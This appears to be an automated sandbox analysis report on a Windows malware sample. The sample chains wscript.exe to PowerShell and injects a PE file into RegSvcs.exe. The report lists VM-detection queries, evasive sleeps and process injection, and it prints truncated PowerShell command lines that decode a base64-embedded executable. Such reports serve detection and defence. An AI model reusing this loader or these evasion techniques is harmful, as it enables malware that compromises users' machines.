Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1280	Thread sleep time: -30000s >= -30000s			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4332	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Contains long sleeps (>= 3 min)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3736			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 3392			Jump to behavior

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Found WSH timer for Javascript or VBS script (likely evasive script)

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 99859	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 99743	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 99638	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 99516	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 99359	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 99244	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 99124	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 98998	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 98874	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 98761	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 98656	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 98546	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 98422	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: wscript.exe, 00000000.00000003.302307322.000001D52CD5A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b8b}x
Source: RegSvcs.exe, 00000003.00000002.831596259.0000000005FD9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllowerManagementCapabilities
Source: powershell.exe, 00000001.00000003.310430015.0000028B4A593000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll>

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Writes to foreign memory regions

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 42C000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 42E000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 972008	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A

Jump to behavior

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" [byte[]] $rowg = [system.convert]::frombase64string('tvqqaamaaaaeaaaa//8aalgaaaaaaaaaqaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaagaaaaa4fug4atannibgbtm0hvghpcybwcm9ncmftignhbm5vdcbizsbydw4gaw4gre9tig1vzguudq0kjaaaaaaaaabqrqaataedalaz+mmaaaaaaaaaaoaaaielavaaacyaaaagaaaaaaaaskqaaaagaaaayaaaaaaaeaagaaaaagaabaaaaaaaaaagaaaaaaaaaacgaaaaagaaaaaaaamayiuaabaaabaaaaaaeaaaeaaaaaaaabaaaaaaaaaaaaaaagbeaabpaaaaagaaacgdaaaaaaaaaaaaaaaaaaaaaaaaaiaaaawaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaiaaacaaaaaaaaaaaaaaaccaaaegaaaaaaaaaaaaaac50zxh0aaaaucqaaaagaaaajgaaaaiaaaaaaaaaaaaaaaaaacaaagaucnnyywaaacgdaaaayaaaaaqaaaaoaaaaaaaaaaaaaaaaaabaaabalnjlbg9jaaamaaaaaiaaaaacaaaalaaaaaaaaaaaaaaaaaaaqaaaqgaaaaaaaaaaaaaaaaaaaacuraaaaaaaaegaaaacaauaxcgaaoqaaaadaaaaaaaaakhdaac4aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaab4ckaeaaaoqhgioawaaciqmcwqaaaqaaqaabhmfaaakgaiaaarzbgaacoadaaaecwcaaaqabaaabcoufgeaaarvcaaacioufgiaaarvcqaacioufgmaaarvcgaacioufgqaaarvcwaacirwfguaaaqukboaaaosaisgfguaaaqqcgeaahdqbqaaaigpaaakbxsaaapzhaaacoafaaaek9oafgyaaaqqhgkabgaabcpwcwwaaayohqaacnqgaaacgacaaaqqhgiohgaacioafgcaaaqqgignaaagkh4ckbiaaaoqabmwbabaaaaaaqaaexihaabwcxyrarzfagaaaaiaaaayaaaakx8xdad+iaaacgixkbsaaaysbxckfyvbkw0if9ymgcvscbsx3xykbiobmaoabqqaaaiaabfylqaacaioiqaacgwwkwewrqmaaaacaaaadqaaabgaaaaririd/hupaaacfyviegt+fq4aaaiyk9csaxz9gaaabbkrzbid0a8aaaiodwaacigiaaakuh0naaaeaygjaaaklq0icqeaahadkcqaaaomagh+jqaacn4laaakfhp+jqaachqsaxiekbaaaaytbnmmaaakegqfpcgnaaakewuwkwewrrqaaaafaaaafqaaacqaaaazaaaadaaaamaaaadtaaaa8gaaaaibaabqaqaazqeaag8baaciaqaanaeaalabaadiaqaa3geaaa0caaasagaaxqiaadhxagaabbefhztwkccaaaotbhcrliczaaaajqkaaaetbxgrhxehfiacaaeanhk4ep///ygoaaakgjmweqr7cgaabbehkbeaaaythhmmaaakeheeewoaaaqrbygsaaaglqzzjgaacnorbx8plbmigjg3////eqr7cqaabbeihtyscrosasgvaaaglqzzjgaacnorbhejmxyrbhsjaaaeeqkofwaabiwgcyyaaap6bbefh1dwkccaaaotchs46/7//wqrbr9u1ignaaakewsconj+//8rbhsjaaaeeqyrciaamaaah0aogaaabhmnhti5/v//bs0leq0tirctdb44qf7//xeeewkaaaqweqogadaaab9akbgaaaytdrenlqzzjgaacnorbhsjaaaeeq0eeqssasgwaaaglqzzjgaacnorbsd4aaaa1hmohwk4w/7//wqrbrzwkckaaaox2hmrhwo4rv7//xyteh8lodz+//84nwaaaaqrdh8m1ignaaakexmfddgj/v//bbeohxdwkccaaaotfb8noa/+//8eeq4ffnyojwaachmvhw44+/3//xeulesrfbfaf9angwaaarmwhw844/3//wqrfrewfhewjmkokgaach8qom39//8rbhsjaaaeeq0re9yrfhewjmksasgwaaaglqzzjgaacnordh8o1hmohxe4nv3//xesf9ytehesere+wp///xenkcsaaaotdx8soh/9//8rbhsjaaaeeqge1hepghibkbyaaaytbnmmaaakegqrbr8o1ignaaakexafezho/f//eqwsbbegew0rbx8seq0renaehxq4nf3//ygoaaakgjmweqr7cgaabbehkbmaaaythhmmaaakeheeewoaaaqrbyguaaaglqzzjgaacnorbhskaaaekbkaaayvmwzzjgaacnrescgsaaakfisbfkudaaaaagaaabqaaaakaaaakyorbhslaaaehcgtaaakexcxk9srfywherdvlgaachykgcvlkc8aaaozk8peahckbioaaabbhaaaaaaaafsaaabeawaauqmaaegaaaayaaabhgioegaaciobmaqa7qaaaamaabfzmaaaciuomqaacm8yaaakaigzaaakkdqaaapypqaachkxaabwbzuaaapytqaachldaabwbzuaaapyxwaachltaabwbzuaaapy1waachljaabwbzuaaapy5waachl5aabwbzuaaapy/qaachipaqbwbzuaaapyeweachilaqbwbzuaaapyk
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" [byte[]] $rowg = [system.convert]::frombase64string('tvqqaamaaaaeaaaa//8aalgaaaaaaaaaqaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaagaaaaa4fug4atannibgbtm0hvghpcybwcm9ncmftignhbm5vdcbizsbydw4gaw4gre9tig1vzguudq0kjaaaaaaaaabqrqaataedalaz+mmaaaaaaaaaaoaaaielavaaacyaaaagaaaaaaaaskqaaaagaaaayaaaaaaaeaagaaaaagaabaaaaaaaaaagaaaaaaaaaacgaaaaagaaaaaaaamayiuaabaaabaaaaaaeaaaeaaaaaaaabaaaaaaaaaaaaaaagbeaabpaaaaagaaacgdaaaaaaaaaaaaaaaaaaaaaaaaaiaaaawaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaiaaacaaaaaaaaaaaaaaaccaaaegaaaaaaaaaaaaaac50zxh0aaaaucqaaaagaaaajgaaaaiaaaaaaaaaaaaaaaaaacaaagaucnnyywaaacgdaaaayaaaaaqaaaaoaaaaaaaaaaaaaaaaaabaaabalnjlbg9jaaamaaaaaiaaaaacaaaalaaaaaaaaaaaaaaaaaaaqaaaqgaaaaaaaaaaaaaaaaaaaacuraaaaaaaaegaaaacaauaxcgaaoqaaaadaaaaaaaaakhdaac4aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaab4ckaeaaaoqhgioawaaciqmcwqaaaqaaqaabhmfaaakgaiaaarzbgaacoadaaaecwcaaaqabaaabcoufgeaaarvcaaacioufgiaaarvcqaacioufgmaaarvcgaacioufgqaaarvcwaacirwfguaaaqukboaaaosaisgfguaaaqqcgeaahdqbqaaaigpaaakbxsaaapzhaaacoafaaaek9oafgyaaaqqhgkabgaabcpwcwwaaayohqaacnqgaaacgacaaaqqhgiohgaacioafgcaaaqqgignaaagkh4ckbiaaaoqabmwbabaaaaaaqaaexihaabwcxyrarzfagaaaaiaaaayaaaakx8xdad+iaaacgixkbsaaaysbxckfyvbkw0if9ymgcvscbsx3xykbiobmaoabqqaaaiaabfylqaacaioiqaacgwwkwewrqmaaaacaaaadqaaabgaaaaririd/hupaaacfyviegt+fq4aaaiyk9csaxz9gaaabbkrzbid0a8aaaiodwaacigiaaakuh0naaaeaygjaaaklq0icqeaahadkcqaaaomagh+jqaacn4laaakfhp+jqaachqsaxiekbaaaaytbnmmaaakegqfpcgnaaakewuwkwewrrqaaaafaaaafqaaacqaaaazaaaadaaaamaaaadtaaaa8gaaaaibaabqaqaazqeaag8baaciaqaanaeaalabaadiaqaa3geaaa0caaasagaaxqiaadhxagaabbefhztwkccaaaotbhcrliczaaaajqkaaaetbxgrhxehfiacaaeanhk4ep///ygoaaakgjmweqr7cgaabbehkbeaaaythhmmaaakeheeewoaaaqrbygsaaaglqzzjgaacnorbx8plbmigjg3////eqr7cqaabbeihtyscrosasgvaaaglqzzjgaacnorbhejmxyrbhsjaaaeeqkofwaabiwgcyyaaap6bbefh1dwkccaaaotchs46/7//wqrbr9u1ignaaakewsconj+//8rbhsjaaaeeqyrciaamaaah0aogaaabhmnhti5/v//bs0leq0tirctdb44qf7//xeeewkaaaqweqogadaaab9akbgaaaytdrenlqzzjgaacnorbhsjaaaeeq0eeqssasgwaaaglqzzjgaacnorbsd4aaaa1hmohwk4w/7//wqrbrzwkckaaaox2hmrhwo4rv7//xyteh8lodz+//84nwaaaaqrdh8m1ignaaakexmfddgj/v//bbeohxdwkccaaaotfb8noa/+//8eeq4ffnyojwaachmvhw44+/3//xeulesrfbfaf9angwaaarmwhw844/3//wqrfrewfhewjmkokgaach8qom39//8rbhsjaaaeeq0re9yrfhewjmksasgwaaaglqzzjgaacnordh8o1hmohxe4nv3//xesf9ytehesere+wp///xenkcsaaaotdx8soh/9//8rbhsjaaaeeqge1hepghibkbyaaaytbnmmaaakegqrbr8o1ignaaakexafezho/f//eqwsbbegew0rbx8seq0renaehxq4nf3//ygoaaakgjmweqr7cgaabbehkbmaaaythhmmaaakeheeewoaaaqrbyguaaaglqzzjgaacnorbhskaaaekbkaaayvmwzzjgaacnrescgsaaakfisbfkudaaaaagaaabqaaaakaaaakyorbhslaaaehcgtaaakexcxk9srfywherdvlgaachykgcvlkc8aaaozk8peahckbioaaabbhaaaaaaaafsaaabeawaauqmaaegaaaayaaabhgioegaaciobmaqa7qaaaamaabfzmaaaciuomqaacm8yaaakaigzaaakkdqaaapypqaachkxaabwbzuaaapytqaachldaabwbzuaaapyxwaachltaabwbzuaaapy1waachljaabwbzuaaapy5waachl5aabwbzuaaapy/qaachipaqbwbzuaaapyeweachilaqbwbzuaaapyk			Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string('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			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe			Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
